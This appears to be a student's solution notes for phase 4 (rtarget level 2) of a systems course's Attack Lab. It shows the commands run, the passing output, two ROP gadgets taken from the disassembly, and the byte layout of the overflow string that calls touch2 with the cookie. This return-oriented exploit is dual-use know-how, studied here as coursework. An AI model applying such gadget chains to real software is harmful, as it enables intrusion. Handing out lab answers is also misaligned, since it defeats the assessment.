Command and output:
$ objdump -d rtarget > rtarget_disassembly.txt
$ ./hex2raw < rtarget_input_p4.txt > rtarget_input_hex.txt
$ ./rtarget -q -i rtarget_input_hex.txt
Cookie: 0x59b997fa
Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
	user id	bovik
	course	15213-f15
	lab	attacklab
	result	1:PASS:0xffffffff:rtarget:2:01 02 03 04 05 06 07 08 09 10 01 02 03 04 05 06 07 08 09 10 01 02 03 04 05 06 07 08 09 10 01 02 03 04 05 06 07 08 09 10 AB 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 A2 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00

1) Similar to phase 2, we need to move the cookie value
to %rdi, and then invoke touch2(). This can be done through the
following 2 gadgets:
[gadget 1]
popq %rax
nop
ret

byte codes by using the figure 3 in lab manual:
58
90
c3
The above gadget can be constructed by [0x4019ab, 0x4019ad]
(function addval_219) in rtarget_disassembly.txt

[gadget 2]
mov %rax %rdi
ret

byte codes:
48 89 c7
c3
The above gadget can be constructed by [0x4019a2, 0x4019a5]
(function addval_273) in rtarget_disassembly.txt

2) The value of the cookie is 0x59b997fa

3) The string should be constructed as:
dummy 40 bytes
+ return address 0x4019ab (augment to 64 bits) (input string as "ab 19 40 00...")
+ cookie value 0x59b997fa (augment to 64 bits) (input string as "fa 97 b9 59 00...")
+ return address 0x4019a2 (augment to 64 bits) (input string as "a2 19 40 00")
+ return address of touch2(): 0x4017ec (augment to 64 bits) (input string as "ec 17 40 00...")